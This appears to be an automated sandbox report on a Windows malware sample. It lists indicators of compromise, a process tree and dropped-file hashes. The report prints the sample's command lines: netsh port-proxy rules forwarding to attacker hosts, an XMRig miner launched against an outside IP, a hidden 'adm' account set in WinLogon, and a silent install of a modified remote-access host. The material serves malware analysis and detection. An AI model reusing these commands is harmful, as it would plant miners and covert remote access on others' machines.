Analysis
-
max time kernel
134s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18-05-2022 12:32
Static task
static1
Behavioral task
behavioral1
Sample
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Resource
win10v2004-20220414-en
General
-
Target
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
-
Size
397KB
-
MD5
45626e0ba033517e92404779ed548fb1
-
SHA1
72722ee51dc3cb8be87f35203b0bd41a380c9a52
-
SHA256
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4
-
SHA512
9227d419b99cc75921d0a8fc12851954905e49d3ad83d399813ba5d18e5c3171e62c076cd4d8dd9a58e0881bc77b90db0ace80dd932a8048eb037154039f3f15
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
$77_oracle.exe$77_oracle.exeRMS.exeinstaller.exepid process 2372 $77_oracle.exe 4648 $77_oracle.exe 3120 RMS.exe 2228 installer.exe -
Sets file execution options in registry 2 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exeRMS.exeinstaller.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation RMS.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation installer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe -
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exedescription ioc process File created C:\Windows\SoftwareDistribution\config.xml 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXEpid process 3500 NETSTAT.EXE 3136 NETSTAT.EXE 3424 NETSTAT.EXE 4064 NETSTAT.EXE 3748 NETSTAT.EXE 3812 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exeinstaller.exepid process 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe 2228 installer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 664 664 -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe Token: SeSecurityPrivilege 228 msiexec.exe Token: SeDebugPrivilege 3748 NETSTAT.EXE Token: SeDebugPrivilege 3812 NETSTAT.EXE Token: SeDebugPrivilege 3500 NETSTAT.EXE Token: SeLockMemoryPrivilege 2372 $77_oracle.exe Token: SeLockMemoryPrivilege 2372 $77_oracle.exe Token: SeDebugPrivilege 3136 NETSTAT.EXE Token: SeDebugPrivilege 3424 NETSTAT.EXE Token: SeDebugPrivilege 4064 NETSTAT.EXE Token: SeLockMemoryPrivilege 4648 $77_oracle.exe Token: SeLockMemoryPrivilege 4648 $77_oracle.exe Token: SeShutdownPrivilege 4576 msiexec.exe Token: SeIncreaseQuotaPrivilege 4576 msiexec.exe Token: SeSecurityPrivilege 1032 msiexec.exe Token: SeCreateTokenPrivilege 4576 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4576 msiexec.exe Token: SeLockMemoryPrivilege 4576 msiexec.exe Token: SeIncreaseQuotaPrivilege 4576 msiexec.exe Token: SeMachineAccountPrivilege 4576 msiexec.exe Token: SeTcbPrivilege 4576 msiexec.exe Token: SeSecurityPrivilege 4576 msiexec.exe Token: SeTakeOwnershipPrivilege 4576 msiexec.exe Token: SeLoadDriverPrivilege 4576 msiexec.exe Token: SeSystemProfilePrivilege 4576 msiexec.exe Token: SeSystemtimePrivilege 4576 msiexec.exe Token: SeProfSingleProcessPrivilege 4576 msiexec.exe Token: SeIncBasePriorityPrivilege 4576 msiexec.exe Token: SeCreatePagefilePrivilege 4576 msiexec.exe Token: SeCreatePermanentPrivilege 4576 msiexec.exe Token: SeBackupPrivilege 4576 msiexec.exe Token: SeRestorePrivilege 4576 msiexec.exe Token: SeShutdownPrivilege 4576 msiexec.exe Token: SeDebugPrivilege 4576 msiexec.exe Token: SeAuditPrivilege 4576 msiexec.exe Token: SeSystemEnvironmentPrivilege 4576 msiexec.exe Token: SeChangeNotifyPrivilege 4576 msiexec.exe Token: SeRemoteShutdownPrivilege 4576 msiexec.exe Token: SeUndockPrivilege 4576 msiexec.exe Token: SeSyncAgentPrivilege 4576 msiexec.exe Token: SeEnableDelegationPrivilege 4576 msiexec.exe Token: SeManageVolumePrivilege 4576 msiexec.exe Token: SeImpersonatePrivilege 4576 msiexec.exe Token: SeCreateGlobalPrivilege 4576 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
$77_oracle.exe$77_oracle.exepid process 2372 $77_oracle.exe 4648 $77_oracle.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
installer.exepid process 2228 installer.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.execsc.exeRMS.exeinstaller.exedescription pid process target process PID 3384 wrote to memory of 2296 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe csc.exe PID 3384 wrote to memory of 2296 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe csc.exe PID 2296 wrote to memory of 4560 2296 csc.exe cvtres.exe PID 2296 wrote to memory of 4560 2296 csc.exe cvtres.exe PID 3384 wrote to memory of 1492 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe chcp.com PID 3384 wrote to memory of 1492 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe chcp.com PID 3384 wrote to memory of 4800 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 4800 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 3748 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3748 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3812 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3812 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3500 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3500 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 4912 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 4912 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 328 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 328 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 1864 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 1864 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 3504 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 3504 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2664 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2664 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2372 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe $77_oracle.exe PID 3384 wrote to memory of 2372 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe $77_oracle.exe PID 3384 wrote to memory of 2856 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2856 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 3136 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3136 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3424 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 3424 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 4064 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 4064 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe NETSTAT.EXE PID 3384 wrote to memory of 756 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 756 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 5092 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 5092 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2288 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 2288 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe netsh.exe PID 3384 wrote to memory of 3120 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe RMS.exe PID 3384 wrote to memory of 3120 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe RMS.exe PID 3384 wrote to memory of 3120 3384 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe RMS.exe PID 3120 wrote to memory of 2228 3120 RMS.exe installer.exe PID 3120 wrote to memory of 2228 3120 RMS.exe installer.exe PID 3120 wrote to memory of 2228 3120 RMS.exe installer.exe PID 2228 wrote to memory of 4576 2228 installer.exe msiexec.exe PID 2228 wrote to memory of 4576 2228 installer.exe msiexec.exe PID 2228 wrote to memory of 4576 2228 installer.exe msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe"C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe"1⤵
- Checks computer location settings
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmp"3⤵
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe"C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.542⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Users\Admin\AppData\Local\Temp\RMS.exe"C:\Users\Admin\AppData\Local\Temp\RMS.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeC:\Users\Admin\AppData\Local\Temp\$77_oracle.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BD88F9647C19DCABFC93C4C4F47249C02⤵
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall2⤵
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall2⤵
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFilesize
6.0MB
MD5c9704931d887685d96ce92d637d84045
SHA10875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA2560448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA5123b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFilesize
6.0MB
MD5c9704931d887685d96ce92d637d84045
SHA10875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA2560448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA5123b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFilesize
6.0MB
MD5c9704931d887685d96ce92d637d84045
SHA10875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA2560448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA5123b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFilesize
1.9MB
MD59feb2c3ed2e5390079e4eea98f11a9a8
SHA1b5cd56f0e474bf45075f5ce80b0f6ecfa4b378f8
SHA2569baf9cebeab9046da0644494e7cf1f498d2dd0e345ae45c279697e5cd818f80b
SHA51297216dc921cad3fbeb2d6ebd4b5cdb1654420158e3618bb08d4802e79648cd237bedc3d87146eb911e9c9a3ef757e6f85a9fdcb211560326b59581d2c13b3f1b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exeFilesize
6.0MB
MD5c9704931d887685d96ce92d637d84045
SHA10875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA2560448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA5123b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exeFilesize
6.0MB
MD5c9704931d887685d96ce92d637d84045
SHA10875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA2560448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA5123b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msiFilesize
7.4MB
MD573e578a44265558d3ace212869d43cbb
SHA1d2c15578def8996ed0ae4a44754055b774b095a7
SHA2568a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4
SHA512fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4
-
C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmpFilesize
1KB
MD5709dfc3a899f8127427c5fb788215ab4
SHA1db7e31d32f16f9e0978d14df17d9160c08065853
SHA256e6fdacaa5792c0d7146b811df67eb084e774760cd8672007f75be3642060418a
SHA512aaad5b90af7e0a89b686850641811cc333e436baa86a43a4d5d3528737db6e422a46827f2de62966f66f61c4973fc923fd7a1622d1e8e4d7c5706082211988db
-
C:\Users\Admin\AppData\Local\Temp\RMS.exeFilesize
8.3MB
MD573f351beae5c881fafe36f42cde9a47c
SHA1dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
C:\Users\Admin\AppData\Local\Temp\RMS.exeFilesize
8.3MB
MD573f351beae5c881fafe36f42cde9a47c
SHA1dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
C:\Users\Admin\AppData\Local\Temp\config.jsonFilesize
3KB
MD574fb175e205d74c162df04f8236ec94b
SHA157ccfe00ef11556ffa576c74eeecf3730659ae89
SHA2561fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9
SHA5128b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830
-
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.dllFilesize
3KB
MD5b198909a9684d9698aeaa29d9a143616
SHA15f9d4bf700b95316880bc52c7a1cf8805f0eeaec
SHA256ccebfa9d569486728c6b145dd88ad0e7ce02d5e7c8f648b9adf6cdae312541d6
SHA51207b9efeed115a65f9079ada86c7781eb48f3316ea5c7f3fdfee50cd08f0b75f2bbd0f02bd32fd1056a0850f9fe94fe9622656326ad43b4f12797606860ecf138
-
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.pdbFilesize
11KB
MD58c738b1fbeccbda3a10b2566c5f7fb38
SHA1294180465e1c8b9e58689240c378c34cd8c381b3
SHA2560c6de1492339ccab4d58760e70a427dc0f97dac4714fac05603351898b72bfcb
SHA512f9ac5e3ffd41e66f6a9494264ff39bd765438b92ae3d5d22a58e12f099d1762649562f41aeff2559751ce8407a73e32a963c5c1862be5533d58404a7e8bea743
-
C:\Windows\Installer\MSIB1D6.tmpFilesize
125KB
MD5b0bcc622f1fff0eec99e487fa1a4ddd9
SHA149aa392454bd5869fa23794196aedc38e8eea6f5
SHA256b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA5121572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7
-
C:\Windows\Installer\MSIB1D6.tmpFilesize
125KB
MD5b0bcc622f1fff0eec99e487fa1a4ddd9
SHA149aa392454bd5869fa23794196aedc38e8eea6f5
SHA256b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA5121572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7
-
\??\c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmpFilesize
652B
MD5a6a9bc5c90629873f6650f8135035a37
SHA15c64043a41b3e0bd3bde02c49aa55d99a79fd4ea
SHA2566eddfef4f7bba1244f6aa230b6a21488f2aa7a49c7000640f6169abd23f78879
SHA5123026a9d77a9b1b7b8f67d76181a76c70f7b846c8cf07006a3df5e1f4aa8ddfd45e04720089cad0cdde582ce4294de152b8511e11882287df0cfd4e745b1b0502
-
\??\c:\Users\Admin\AppData\Local\Temp\d9w9p_jz.0.csFilesize
447B
MD51640a04633fee0dfdc7e22c4f4063bf6
